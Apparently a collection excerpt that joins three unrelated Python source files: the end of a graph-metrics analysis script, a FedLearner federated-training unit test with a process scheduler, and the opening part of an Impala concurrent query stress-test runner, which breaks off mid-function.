G_initial = pickle.load(initial_graph_loaded)
initial_graph_loaded.close()
with open(Path(data_dir, f[final_graph]), 'rb') as final_graph_loaded:
G_final = pickle.load(final_graph_loaded)
final_graph_loaded.close()
initial_ave_shortest_path = nx.average_shortest_path_length(G_initial.convert_to_nx_graph(timestep=shortest_path_at_timestep), weight='weight')
final_ave_shortest_path = nx.average_shortest_path_length(G_final.convert_to_nx_graph(timestep=shortest_path_at_timestep), weight='weight')
return final_ave_shortest_path - initial_ave_shortest_path
def ave_degree_diff(data_dir, initial_graph=0, final_graph=-1, ave_degree_at_timestep=-1):
"""
Loads and evaluates the average length of the last (shortest_path_at) timestep of the (initial, final)
data graph and takes their difference. TODO: Will this always yield [0.]?
Also known as ~k_nearest_neighbors algorithm
"""
for root, dirs, files in os.walk(data_dir):
f = sorted(files) # Order preserved due to 0 padding.
with open(Path(data_dir, f[initial_graph]), 'rb') as initial_graph_loaded:
G_initial = pickle.load(initial_graph_loaded)
initial_graph_loaded.close()
with open(Path(data_dir, f[final_graph]), 'rb') as final_graph_loaded:
G_final = pickle.load(final_graph_loaded)
final_graph_loaded.close()
initial_ave_degree = np.array(list(nx.average_degree_connectivity(G_initial.convert_to_nx_graph(timestep=ave_degree_at_timestep), weight='weight').values()))
final_ave_degree = np.array(list(nx.average_degree_connectivity(G_final.convert_to_nx_graph(timestep=ave_degree_at_timestep), weight='weight').values()))
return final_ave_degree - initial_ave_degree
# Hierarchy Coordinates: ---------------------------------------------------------------------------------------------
def plot_hierarchy_evolution(graph, time_between_sampling, morphospace_limits=True):
coordinates = np.zeros((1, 3))
for timestep in range(0, graph.A.shape[0], time_between_sampling):
coordinates[-1] = graph.average_hierarchy_coordinates(timestep=timestep)
coordinates = np.vstack((coordinates, [coordinates[-1]]))
print(f'coordinates: {coordinates}')
plot_limits = None
if morphospace_limits: plot_limits = [[-1, 1], [0, 1], [0, 1]]
color_map = [int(i * 255 / coordinates.shape[0]) for i in np.arange(coordinates.shape[0], 0, -1)] # color scale by selectivity value reversed
general_3d_data_plot(coordinates, xlabel='Treeness', ylabel='Feedforwardness', zlabel='Orderability', plot_limits=plot_limits, color=color_map, show=True)
########################################################################################################################
if __name__ == "__main__":
# CHECK VERSIONS
vers_python0 = '3.7.3'
vers_numpy0 = '1.17.3'
vers_matplotlib0 = '3.1.1'
vers_netx0 = '2.5'
from sys import version_info
from matplotlib import __version__ as vers_matplotlib
from networkx import __version__ as vers_netx
vers_python = '%s.%s.%s' % version_info[:3]
vers_numpy = np.__version__
print('\n------------------- Network Diffusion Adaptation ----------------------------\n')
print('Required modules:')
print('Python: tested for: %s. Yours: %s' % (vers_python0, vers_python))
print('numpy: tested for: %s. Yours: %s' % (vers_numpy0, vers_numpy))
print('matplotlib: tested for: %s. Yours: %s' % (vers_matplotlib0, vers_matplotlib))
print('networkx: tested for: %s. Yours: %s' % (vers_netx0, vers_netx))
print('\n------------------------------------------------------------------------------\n')
|
test_nn_trainer.py
|
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import unittest
import threading
import random
import os
import time
import logging
from multiprocessing import Process
import tensorflow.compat.v1 as tf
from tensorflow.compat.v1 import gfile
from queue import PriorityQueue
import enum
from tensorflow.core.example.feature_pb2 import FloatList, Features, Feature, \
Int64List, BytesList
from tensorflow.core.example.example_pb2 import Example
import numpy as np
from fedlearner.data_join import (
data_block_manager, common,
data_block_visitor, raw_data_manifest_manager
)
from fedlearner.common import (
mysql_client, common_pb2 as common_pb,
data_join_service_pb2 as dj_pb
)
from fedlearner.data_join.data_block_manager import DataBlockBuilder
from fedlearner.data_join.raw_data_iter_impl.tf_record_iter import TfExampleItem
from fedlearner.trainer_master.leader_tm import LeaderTrainerMaster
from fedlearner.trainer_master.follower_tm import FollowerTrainerMaster
from fedlearner.data_join.common import get_kvstore_config
from graph_def.leader import main as lm
from graph_def.follower import main as fm
debug_mode = False
local_mnist_path = "./mnist.npz"
output_path = "./output"
logging.getLogger().setLevel(logging.INFO)
total_worker_num = 1
child_env = os.environ.copy()
child_env["KVSTORE_USE_MOCK"] = "on"
child_env["KVSTORE_MOCK_DISK_SYNC"] = "on"
os.environ = child_env
class _Task(object):
def __init__(self, name, weight, target, args=None, kwargs=None, daemon=None, force_quit=False):
self.name = name
self.weight = 0 - weight
self._target = target
self._args = args
self._kwargs = kwargs
self.force_quit = force_quit
self._daemon = True
self._lock = threading.Lock()
self._task = None
self._stop = False
self._start_new()
def _start_new(self):
if self._task is not None and self._task.is_alive():
logging.info(" %s is alive, no need to start new" % self.name)
return
self._task = Process(target=self._target, name=self.name,
args=self._args, kwargs=self._kwargs, daemon=self._daemon)
if isinstance(self._args[0], Args):
logging.info("delete %s", self._args[0].export_path)
if gfile.Exists(self._args[0].export_path):
logging.info(" deleting")
gfile.DeleteRecursively(self._args[0].export_path)
self._task.start()
logging.info("Task starts %s" % self.name)
time.sleep(10)
def __gt__(self, o):
return self.weight > o.weight
def kill(self, force = False):
with self._lock:
logging.info("Kill task %s", self.name)
if self._task is None or not self._task.is_alive():
return
if force or self.force_quit:
self._task.terminate()
elif self._task.is_alive():
raise ValueError("can not kill by force")
def start(self):
logging.info("begin to start")
with self._lock:
if self._stop:
return
if self._task.is_alive():
logging.info(" %s is alive, no need to start" % self.name)
return
self._start_new()
time.sleep(2)
def is_alive(self):
with self._lock:
if self._task is None:
return True
return self._task.is_alive()
class _Signal(enum.Enum):
KILL = 1
RUN = 2
class _Event(object):
def __init__(self, name, action, timeout):
self.name = name
self.action = action
self.timeout = timeout
self._start_time = time.time()
self._trigged = False
def handle(self, task):
if self._trigged:
return
if self.timeout + self._start_time > time.time():
return
logging.info("handle event: %s=%s", task.name, self.action)
self._trigged = True
if self.action == _Signal.KILL:
task.kill(True)
elif self.action == _Signal.RUN:
task.start()
else:
raise ValueError("unknown event %d" % self.action)
class _TaskScheduler(object):
def __init__(self, timeout):
self._task_queue = PriorityQueue()
self._task_done = {}
self._start_time = time.time()
self._event_queue = []
self._task_killed = {}
self._keepalive = []
self._timeout = timeout
def submit(self, task):
self._keepalive.append(task.name)
self._task_queue.put(task)
def recv(self, ev):
self._event_queue.append(ev)
def _handle_events(self, name, task):
for e in self._event_queue:
if e.name == name:
e.handle(task)
def bye(self):
while not self._task_queue.empty():
task = self._task_queue.get()
if task.is_alive():
task.kill(True)
def run(self):
while not self._task_queue.empty():
task = []
done = {}
while not self._task_queue.empty():
next_task = self._task_queue.get()
logging.info("handle queue: %s", next_task.name)
if not next_task.is_alive():
done[next_task.name] = next_task
continue
self._handle_events(next_task.name, next_task)
if next_task.is_alive():
task.append(next_task)
else:
done[next_task.name] = next_task
for t in task:
self._task_queue.put(t)
for k, v in done.items():
if k in self._keepalive:
if v._task.exitcode != 0:
v.start()
self._task_queue.put(v)
continue
self._task_done[k] = v
time.sleep(1)
if self._timeout + self._start_time < time.time():
logging.info("stop!!!!!")
return
def make_ckpt_dir(role, remote="local", rank=None):
if rank is None:
rank = "N"
ckpt_path = "{}/{}_ckpt_{}_{}".format(output_path, remote, role, rank)
exp_path = "{}/saved_model".format(ckpt_path)
if gfile.Exists(ckpt_path):
gfile.DeleteRecursively(ckpt_path)
return ckpt_path, exp_path
def run_leader_tm(app_id, data_source, port, env=None):
if env is not None:
os.environ = env
leader_tm = LeaderTrainerMaster(app_id, data_source,
None, None,
False,False, 1)
leader_tm.run(listen_port=int(port))
def run_ps(port, env=None):
if env is not None:
os.environ = env
addr = "0.0.0.0:{}".format(port)
cluster_spec = tf.train.ClusterSpec({'local': {0: addr}})
server = tf.train.Server(cluster_spec, job_name="local", task_index=0)
server.join()
def run_follower_tm(app_id, data_source, port, env=None):
if env is not None:
os.environ = env
follower_tm = FollowerTrainerMaster(app_id, data_source, False)
follower_tm.run(listen_port=int(port))
def run_lm(args, env=None):
if env is not None:
os.environ = env
lm(args)
def run_fm(args, env=None):
if env is not None:
os.environ = env
fm(args)
class Args(object):
def __init__(self, local_addr=None, peer_addr=None, app_id=None, master_addr=None,
data_source=None, data_path=None, ckpt_path=None, export_path=None,
start_time=None, end_time=None, tf_addr=None, cluster_spec=None, ps_addrs=None,
worker_rank=0):
self.local_addr = local_addr
self.peer_addr = peer_addr
self.worker_rank = worker_rank
self.cluster_spec = cluster_spec
self.ps_addrs = ps_addrs
self.data_source = data_source
self.data_path = data_path
self.application_id = app_id
self.start_time = start_time
self.end_time = end_time
self.master_addr = master_addr
self.tf_addr = tf_addr
self.checkpoint_path = ckpt_path
self.save_checkpoint_steps = 100
self.save_checkpoint_secs = None
self.export_path = export_path
self.sparse_estimator = False
self.mode = "train"
self.summary_path = None
self.summary_save_steps = None
self.verbosity = 1;
self.batch_size = 100
self.learning_rate = 0.01
class TestNNTraining(unittest.TestCase):
def _create_local_data(self, xl, xf, y):
N = 10
chunk_size = xl.shape[0]//N
leader_worker_path = os.path.join(output_path, "data/leader")
follower_worker_path = os.path.join(output_path, "data/follower")
data_path = os.path.join(output_path, "data")
if gfile.Exists(data_path):
gfile.DeleteRecursively(data_path)
os.makedirs(leader_worker_path)
os.makedirs(follower_worker_path)
for i in range(N):
filename_l = os.path.join(leader_worker_path, '%02d.tfrecord'%i)
filename_f = os.path.join(follower_worker_path, '%02d.tfrecord'%i)
fl = tf.io.TFRecordWriter(filename_l)
ff = tf.io.TFRecordWriter(filename_f)
for j in range(chunk_size):
idx = i*chunk_size + j
features_l = {}
features_l['example_id'] = Feature(
bytes_list=BytesList(value=[str(idx).encode('utf-8')]))
features_l['y'] = Feature(int64_list=Int64List(value=[y[idx]]))
features_l['x'] = Feature(float_list=FloatList(value=list(xl[idx])))
fl.write(
Example(features=Features(feature=features_l)).SerializeToString())
features_f = {}
features_f['example_id'] = Feature(
bytes_list=BytesList(value=[str(idx).encode('utf-8')]))
features_f['x'] = Feature(float_list=FloatList(value=list(xf[idx])))
ff.write(
Example(features=Features(feature=features_f)).SerializeToString())
fl.close()
ff.close()
def _create_data_block(self, data_source, partition_id, x, y):
data_block_metas = []
dbm = data_block_manager.DataBlockManager(data_source, partition_id)
self.assertEqual(dbm.get_dumped_data_block_count(), 0)
self.assertEqual(dbm.get_lastest_data_block_meta(), None)
N = 200
chunk_size = x.shape[0] // N
leader_index = 0
follower_index = N * chunk_size * 10
for i in range(N):
builder = DataBlockBuilder(
common.data_source_data_block_dir(data_source),
data_source.data_source_meta.name,
partition_id, i,
dj_pb.WriterOptions(output_writer="TF_RECORD"), None
)
builder.set_data_block_manager(dbm)
for j in range(chunk_size):
feat = {}
idx = i * chunk_size + j
exam_id = '{}'.format(idx).encode()
feat['example_id'] = Feature(
bytes_list=BytesList(value=[exam_id]))
evt_time = random.randint(1, 1000)
feat['event_time'] = Feature(
int64_list = Int64List(value=[evt_time])
)
feat['x'] = Feature(float_list=FloatList(value=list(x[idx])))
if y is not None:
feat['y'] = Feature(int64_list=Int64List(value=[y[idx]]))
feat['leader_index'] = Feature(
int64_list = Int64List(value=[leader_index])
)
feat['follower_index'] = Feature(
int64_list = Int64List(value=[follower_index])
)
example = Example(features=Features(feature=feat))
builder.append_item(TfExampleItem(example.SerializeToString()),
leader_index, follower_index)
leader_index += 1
follower_index += 1
data_block_metas.append(builder.finish_data_block())
self.max_index = follower_index
return data_block_metas
def _gen_ds_meta(self, role):
data_source = common_pb.DataSource()
data_source.data_source_meta.name = self.app_id
data_source.data_source_meta.partition_num = 1
data_source.data_source_meta.start_time = 0
data_source.data_source_meta.end_time = 100000
data_source.output_base_dir = "{}/{}_{}/data_source/".format(output_path,
data_source.data_source_meta.name, role)
data_source.role = role
return data_source
def setUp(self):
self.sche = _TaskScheduler(30)
self.kv_store = [None, None]
self.app_id = "test_trainer_v1"
db_database, db_addr, db_username, db_password, db_base_dir = \
get_kvstore_config("etcd")
data_source = [self._gen_ds_meta(common_pb.FLRole.Leader),
self._gen_ds_meta(common_pb.FLRole.Follower)]
for role in range(2):
self.kv_store[role] = mysql_client.DBClient(data_source[role].data_source_meta.name,
db_addr, db_username, db_password, db_base_dir, True)
self.data_source = data_source
(x, y) = (None, None)
if debug_mode:
(x, y), _ = tf.keras.datasets.mnist.load_data(local_mnist_path)
else:
(x, y), _ = tf.keras.datasets.mnist.load_data()
x = x[:200,]
x = x.reshape(x.shape[0], -1).astype(np.float32) / 255.0
y = y.astype(np.int64)
xl = x[:, :x.shape[1]//2]
xf = x[:, x.shape[1]//2:]
self._create_local_data(xl, xf, y)
x = [xl, xf]
for role in range(2):
common.commit_data_source(self.kv_store[role], data_source[role])
if gfile.Exists(data_source[role].output_base_dir):
gfile.DeleteRecursively(data_source[role].output_base_dir)
manifest_manager = raw_data_manifest_manager.RawDataManifestManager(
self.kv_store[role], data_source[role]
)
partition_num = data_source[role].data_source_meta.partition_num
for i in range(partition_num):
self._create_data_block(data_source[role], i,
x[role], y)
#x[role], y if role == 0 else None)
manifest_manager._finish_partition('join_example_rep',
dj_pb.JoinExampleState.UnJoined, dj_pb.JoinExampleState.Joined,
-1, i)
#@unittest.skip("demonstrating skipping")
def test_local_cluster(self):
workers = []
addr = ["localhost:20050", "localhost:20051"]
role = 0
ckpt_path, exp_path = make_ckpt_dir(role)
args = Args(local_addr=addr[role],
peer_addr=addr[(role+1)%2],
app_id=self.app_id,
data_path=os.path.join(output_path, "data/leader"),
ckpt_path=ckpt_path,
export_path=exp_path)
ftm = Process(name="RunLeaderTW", target=run_lm, args=(args, ),
kwargs={'env' : child_env}, daemon=True)
ftm.start()
workers.append(ftm)
role = 1
ckpt_path, exp_path = make_ckpt_dir(role)
args = Args(local_addr=addr[role],
peer_addr=addr[(role+1)%2],
app_id=self.app_id,
data_path=os.path.join(output_path, "data/follower"),
ckpt_path=ckpt_path,
export_path=exp_path)
ftm = Process(name="RunFollowerTW", target=run_fm, args=(args, ),
kwargs={'env' : child_env}, daemon=True)
ftm.start()
workers.append(ftm)
for w in workers:
w.join()
#@unittest.skip("demonstrating skipping")
def test_remote_cluster(self):
self.sche.bye()
master_addr = ["0.0.0.0:4050", "0.0.0.0:4051"]
ps_addr = ["0.0.0.0:5050", "0.0.0.0:5051"]
## launch master
role = 0
tml = _Task(name="RunLeaderTM", target=run_leader_tm, args=(self.app_id,
self.data_source[role].data_source_meta.name,
master_addr[role].split(":")[1],), weight=1, force_quit=True,
kwargs={'env' : child_env}, daemon=True)
self.sche.submit(tml)
role = 1
tml = _Task(name="RunFollowerTM", target=run_follower_tm, args=(self.app_id,
self.data_source[role].data_source_meta.name,
master_addr[role].split(":")[1], ),
kwargs={'env' : child_env}, daemon=True, weight=1, force_quit=True)
self.sche.submit(tml)
## launch PS
for role in range(2):
name = "PS_%d" % role
psl = _Task(name=name, target=run_ps, args=(ps_addr[role].split(":")[1], ),
kwargs={'env' : child_env}, daemon=True, weight=1, force_quit=True)
self.sche.submit(psl)
## launch worker
worker_port, tf_port = 3050, 3150
for rank in range(total_worker_num):
port_fn = lambda port : ["0.0.0.0:%d" % port, "0.0.0.0:%d" % (port + 1)]
worker_addr = port_fn(worker_port)
tf_addr = port_fn(tf_port)
worker_port += 2
tf_port += 2
role = 0
ckpt_path, exp_path = make_ckpt_dir(role, "remote", rank)
args = Args(local_addr=worker_addr[role],
peer_addr=worker_addr[(role+1)%2],
tf_addr=tf_addr[role],
ps_addrs=ps_addr[role],
app_id=self.app_id,
worker_rank = rank,
master_addr=master_addr[role],
ckpt_path=ckpt_path,
export_path=exp_path)
ftm = _Task(name="RunLeaderTW" + str(rank), target=run_lm, args=(args, ),
kwargs={'env' : child_env}, daemon=True, weight=2)
self.sche.submit(ftm)
role = 1
ckpt_path, exp_path = make_ckpt_dir(role, "remote", rank)
args = Args(local_addr=worker_addr[role],
peer_addr=worker_addr[(role+1)%2],
tf_addr=tf_addr[role],
ps_addrs=ps_addr[role],
app_id=self.app_id,
worker_rank = rank,
master_addr=master_addr[role],
ckpt_path=ckpt_path,
export_path=exp_path)
ftm = _Task(name="RunFollowerTW" + str(rank), target=run_fm, args=(args, ),
kwargs={'env' : child_env}, daemon=True, weight=2)
self.sche.submit(ftm)
# mimic the chaos monkey
# case 1: worker restarts itself
#e = _Event("RunFollowerTW", _Signal.KILL, 10)
#self.sche.recv(e)
# case 1: as above
#e = _Event("RunFollowerTM", _Signal.KILL, 10)
#self.sche.recv(e)
# case 2: master fails, but worker is running, master must not alloc data
#e = _Event("RunLeaderTM", _Signal.KILL, 35)
#self.sche.recv(e)
"""case 3: master fails, then force worker to restart, cluster get recovered
netstat -apn | grep "0.0.0.0:40" | awk -F" " '{print $7}' | awk -F "\/" '{print $1}' | xargs kill
netstat -apn | grep "0.0.0.0:30" | awk -F" " '{print $7}' | awk -F "\/" '{print $1}' | xargs kill
netstat -apn | grep "0.0.0.0:50" | awk -F" " '{print $7}' | awk -F "\/" '{print $1}' | xargs kill
"""
self.sche.run()
def tearDown(self):
self.sche.bye()
#if not debug_mode and gfile.Exists(output_path):
# gfile.DeleteRecursively(output_path)
if __name__ == '__main__':
unittest.main()
|
concurrent_select.py
|
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# This module is used to stress test Impala by running queries concurrently.
#
# Stress test outline (and notes):
# 1) Get a set of queries as requested by the user from the CLI options.
# 2) For each query, run it individually to find:
# a) Minimum mem limit to avoid spilling
# b) Minimum mem limit to successfully run the query (spilling allowed)
# c) Runtime when no mem was spilled
# d) Runtime when mem was spilled
# e) A row order independent hash of the result set.
# This is a slow process so the results will be written to disk for reuse.
# 3) Find the memory available to Impalad. This will be done by finding the minimum
# memory available across all impalads (-mem_limit startup option). Ideally, for
# maximum stress, all impalads will have the same memory configuration but this is
# not required.
# 4) Optionally, set an amount of memory that can be overcommitted. Overcommitting
# memory can increase memory pressure which can result in memory being spilled to
# disk or queries failing with out-of-memory.
# 5) Start submitting queries. There are two modes for throttling the number of
# concurrent queries, depending on --test-admission-control.
# a) test-admission-control=false: Submit queries until all available memory (as
# determined by items 3 and 4) is used. Before running the query a query mem
# limit is set between 2a and 2b. (There is a runtime option to increase the
# likelihood that a query will be given the full 2a limit to avoid spilling.)
# b) test-admission-control=true: Submit enough queries to achieve the desired
# level of overcommit, but expect that Impala's admission control will throttle
# queries. In this mode mem_limit is not set per query.
# 6) Randomly cancel queries to test cancellation. There is a runtime option to control
# the likelihood that a query will be randomly canceled.
# 7) If a query errored, verify that the error is expected. Errors are expected in the
# following cases:
# a) Memory-based admission control is not being tested (i.e.
# --test-admission-control=false), the error is an out-of-memory error and memory
# on the cluster is overcommitted.
# b) The error is an admission control rejection or timeout.
# 8) Verify the result set hash of successful queries if there are no DML queries in the
# current run.
from __future__ import print_function
import logging
import os
import re
import signal
import sys
import threading
from Queue import Empty # Must be before Queue below
from argparse import ArgumentDefaultsHelpFormatter, ArgumentParser, Namespace, SUPPRESS
from collections import defaultdict
from copy import copy
from datetime import datetime
from multiprocessing import Lock, Process, Queue, Value
from random import choice, random, randrange, shuffle
from sys import exit, maxint
from tempfile import gettempdir
from textwrap import dedent
from threading import current_thread
from time import sleep, time
import tests.comparison.cli_options as cli_options
from tests.comparison.cluster import Timeout
from tests.comparison.db_types import Int, TinyInt, SmallInt, BigInt
from tests.stress.mem_broker import MemBroker
from tests.stress.runtime_info import save_runtime_info, load_runtime_info
from tests.stress.queries import (QueryType, generate_compute_stats_queries,
generate_DML_queries, generate_random_queries, load_tpc_queries,
load_queries_from_test_file, estimate_query_mem_mb_usage)
from tests.stress.query_runner import (QueryRunner, QueryTimeout,
NUM_QUERIES_DEQUEUED, NUM_QUERIES_SUBMITTED, NUM_QUERIES_STARTED_RUNNING_OR_CANCELLED,
NUM_QUERIES_FINISHED, NUM_QUERIES_EXCEEDED_MEM_LIMIT, NUM_QUERIES_AC_REJECTED,
NUM_QUERIES_AC_TIMEDOUT, NUM_QUERIES_CANCELLED, NUM_RESULT_MISMATCHES,
NUM_OTHER_ERRORS, RESULT_HASHES_DIR, CancelMechanism)
from tests.stress.util import create_and_start_daemon_thread, increment, print_stacks
from tests.util.parse_util import (
EXPECTED_TPCDS_QUERIES_COUNT, EXPECTED_TPCH_NESTED_QUERIES_COUNT,
EXPECTED_TPCH_STRESS_QUERIES_COUNT)
LOG = logging.getLogger(os.path.splitext(os.path.basename(__file__))[0])
PROFILES_DIR = "profiles"
class StressArgConverter(object):
def __init__(self, args):
"""
Convert arguments as returned from from argparse parse_args() into internal forms.
The purpose of this object is to do any conversions needed from the type given by
parge_args() into internal forms. For example, if a commandline option takes in a
complicated string that needs to be converted into a list or dictionary, this is the
place to do it. Access works the same as on the object returned by parse_args(),
i.e., object.option_attribute.
In most cases, simple arguments needn't be converted, because argparse handles the
type conversion already, and in most cases, type conversion (e.g., "8" <str> to 8
<int>) is all that's needed. If a property getter below doesn't exist, it means the
argument value is just passed along unconverted.
Params:
args: argparse.Namespace object (from argparse.ArgumentParser().parse_args())
"""
assert isinstance(args, Namespace), "expected Namespace, got " + str(type(args))
self._args = args
self._common_query_options = None
def __getattr__(self, attr):
# This "proxies through" all the attributes from the Namespace object that are not
# defined in this object via property getters below.
return getattr(self._args, attr)
@property
def common_query_options(self):
# Memoize this, as the integrity checking of --common-query-options need only
# happen once.
if self._common_query_options is not None:
return self._common_query_options
# The stress test sets these, so callers cannot override them.
IGNORE_QUERY_OPTIONS = frozenset([
'ABORT_ON_ERROR',
'MEM_LIMIT',
])
common_query_options = {}
if self._args.common_query_options is not None:
for query_option_and_value in self._args.common_query_options:
try:
query_option, value = query_option_and_value.split('=')
except ValueError:
LOG.error(
"Could not parse --common-query-options: '{common_query_options}'".format(
common_query_options=self._args.common_query_options))
exit(1)
query_option = query_option.upper()
if query_option in common_query_options:
LOG.error(
"Query option '{query_option}' already defined in --common-query-options: "
"'{common_query_options}'".format(
query_option=query_option,
common_query_options=self._args.common_query_options))
exit(1)
elif query_option in IGNORE_QUERY_OPTIONS:
LOG.warn(
"Ignoring '{query_option}' in common query options: '{opt}': "
"The stress test algorithm needs control of this option.".format(
query_option=query_option, opt=self._args.common_query_options))
else:
common_query_options[query_option] = value
LOG.debug("Common query option '{query_option}' set to '{value}'".format(
query_option=query_option, value=value))
self._common_query_options = common_query_options
return self._common_query_options
@property
def runtime_info_path(self):
runtime_info_path = self._args.runtime_info_path
if "{cm_host}" in runtime_info_path:
runtime_info_path = runtime_info_path.format(cm_host=self._args.cm_host)
return runtime_info_path
# To help debug hangs, the stacks of all threads can be printed by sending signal USR1
# to each process.
signal.signal(signal.SIGUSR1, print_stacks)
def print_crash_info_if_exists(impala, start_time):
"""If any impalads are found not running, they will assumed to have crashed and an
error message will be printed to stderr for each stopped impalad. Returns a value
that evaluates to True if any impalads are stopped.
"""
max_attempts = 5
for remaining_attempts in xrange(max_attempts - 1, -1, -1):
try:
crashed_impalads = impala.find_crashed_impalads(start_time)
break
except Timeout as e:
LOG.info(
"Timeout checking if impalads crashed: %s."
% e + (" Will retry." if remaining_attempts else ""))
else:
LOG.error(
"Aborting after %s failed attempts to check if impalads crashed", max_attempts)
raise e
for message in crashed_impalads.itervalues():
print(message, file=sys.stderr)
return crashed_impalads
class StressRunner(object):
"""This class contains functionality related to producing/consuming queries for the
purpose of stress testing Impala.
Queries will be executed in separate processes since python threading is limited
to the use of a single CPU.
"""
# This is the point at which the work queue will block because it is full.
WORK_QUEUE_CAPACITY = 10
def __init__(self):
self.use_kerberos = False
self.common_query_options = {}
self.test_admission_control = False
self._mem_broker = None
self._verify_results = True
self._select_probability = None
# Synchronized blocking work queue for producer/consumers.
self._query_queue = Queue(self.WORK_QUEUE_CAPACITY)
# The Value class provides cross-process shared memory.
self._mem_mb_needed_for_next_query = Value("i", 0)
# This lock provides a way to stop new queries from running. This lock must be
# acquired before writing to the NUM_QUERIES_SUBMITTED metric for the query_runner,
# which is incremented before every query submission.Reading NUM_QUERIES_SUBMITTED is
# allowed without taking this lock.
self._submit_query_lock = Lock()
self.leak_check_interval_mins = None
self._next_leak_check_unix_time = Value("i", 0)
self._max_mem_mb_reported_usage = Value("i", -1) # -1 => Unknown
self._max_mem_mb_usage = Value("i", -1) # -1 => Unknown
self.cancel_probability = 0
self.spill_probability = 0
self.startup_queries_per_sec = 1.0
self.num_successive_errors_needed_to_abort = 1
self._num_successive_errors = Value("i", 0)
self.results_dir = gettempdir()
self._status_headers = [
"Done", "Active", "Executing", "Mem Lmt Ex", "AC Reject", "AC Timeout",
"Cancel", "Err", "Incorrect", "Next Qry Mem Lmt",
"Tot Qry Mem Lmt", "Tracked Mem", "RSS Mem"]
self._num_queries_to_run = None
self._query_producer_thread = None
# This lock is used to synchronize access to the '_query_runners' list and also to all
# the '_past_runners*' members.
self._query_runners_lock = Lock()
self._query_runners = []
# These are the cumulative values of all the queries that have started/finished/-
# dequeued, etc. on runners that have already died. Every time we notice that a query
# runner has died, we update these values.
self._past_runner_metrics = defaultdict(lambda: Value("i", 0))
self._query_consumer_thread = None
self._mem_polling_thread = None
def _record_runner_metrics_before_evict(self, query_runner):
""" Before removing 'query_runner' from the self._query_runners list, record its
metrics. Must only be called if 'query_runner' is to be removed from the list.
MUST hold '_query_runners_lock' before calling.
"""
for key, val in query_runner.get_metric_vals():
self._past_runner_metrics[key].value += val
def _calc_total_runner_metrics(self):
""" Calculate the total of metrics across past and active query runners. """
totals = defaultdict(lambda: 0)
with self._query_runners_lock:
for key in self._past_runner_metrics:
totals[key] = self._past_runner_metrics[key].value
for query_runner in self._query_runners:
for key, val in query_runner.get_metric_vals():
totals[key] += val
return totals
def _calc_total_runner_metric(self, key):
""" Calculate the total of metric 'key' across past and active query runners. """
with self._query_runners_lock:
return self._calc_total_runner_metric_no_lock(key)
def _calc_total_runner_metric_no_lock(self, key):
""" TODO: Get rid of this function after reformatting how we obtain query indices.
_query_runners_lock MUST be taken before calling this function.
"""
total = self._past_runner_metrics[key].value
for runner in self._query_runners:
total += runner.get_metric_val(key)
return total
def _total_num_queries_submitted(self):
return self._calc_total_runner_metric(NUM_QUERIES_SUBMITTED)
def _total_num_queries_active(self):
"""The number of queries that are currently active (i.e. submitted to a query runner
and haven't yet completed)."""
metrics = self._calc_total_runner_metrics()
num_running = metrics[NUM_QUERIES_SUBMITTED] - metrics[NUM_QUERIES_FINISHED]
assert num_running >= 0, "The number of running queries is negative"
return num_running
def _num_runners_remaining(self):
return len(self._query_runners)
def run_queries(
self, queries, impala, num_queries_to_run, mem_overcommit_pct, should_print_status,
verify_results, select_probability
):
"""Runs queries randomly chosen from 'queries' and stops after 'num_queries_to_run'
queries have completed. 'select_probability' should be float between 0 and 1, it
determines the likelihood of choosing a select query (as opposed to a DML query,
for example).
Before a query is run, a mem limit will be chosen. 'spill_probability' determines
the likelihood of choosing a mem limit that will cause spilling. To induce
spilling, a value is randomly chosen below the min memory needed to avoid spilling
but above the min memory needed with spilling. So the min/max query memory
requirements must be determined before calling this method.
If 'mem_overcommit_pct' is zero, an exception will be raised if any queries
fail for any reason other than cancellation (controlled by the 'cancel_probability'
property), since each query should have enough memory to run successfully. If
non-zero, failures due to insufficient memory will be ignored if memory was
overcommitted at any time during execution.
If a query completes without error, the result will be verified if 'verify_results'
is True. An error will be raised upon a result mismatch. 'verify_results' should be
false for the case where the expected results are not known in advance, if we are
running DML queries, for example.
"""
# TODO: The state from a previous run should be cleared out. This isn't really a
# problem now because the one caller (main()) never calls a second time.
if self.startup_queries_per_sec <= 0:
raise Exception("Startup queries per second must be positive")
if self.leak_check_interval_mins is not None and self.leak_check_interval_mins <= 0:
raise Exception("Memory leak check interval must be positive")
# If there is a crash, start looking for errors starting from this time.
self.start_time = datetime.now()
self._mem_broker = MemBroker(
impala.min_impalad_mem_mb,
int(impala.min_impalad_mem_mb * mem_overcommit_pct / 100))
self._verify_results = verify_results
self._select_probability = select_probability
# Print the status to show the state before starting.
if should_print_status:
self._print_status(print_header=True)
self._num_queries_to_run = num_queries_to_run
self._start_polling_mem_usage(impala)
self._start_producing_queries(queries)
self._start_consuming_queries(impala)
# Wait for everything to finish.
self._wait_for_test_to_finish(impala, should_print_status)
# And print the final state.
if should_print_status:
self._print_status()
self._check_for_test_failure()
self.print_duration()
def _start_producing_queries(self, queries):
def enqueue_queries():
# Generate a dict(query type -> list of queries).
queries_by_type = {}
for query in queries:
if query.query_type not in queries_by_type:
queries_by_type[query.query_type] = []
queries_by_type[query.query_type].append(query)
try:
for _ in xrange(self._num_queries_to_run):
# First randomly determine a query type, then choose a random query of that
# type.
if (
QueryType.SELECT in queries_by_type and
(len(queries_by_type.keys()) == 1 or random() < self._select_probability)
):
result = choice(queries_by_type[QueryType.SELECT])
else:
query_type = choice([
key for key in queries_by_type if key != QueryType.SELECT])
result = choice(queries_by_type[query_type])
self._query_queue.put(result)
except Exception as e:
LOG.error("Error producing queries: %s", e)
current_thread().error = e
raise e
LOG.info("Producing thread completed job. Exiting...")
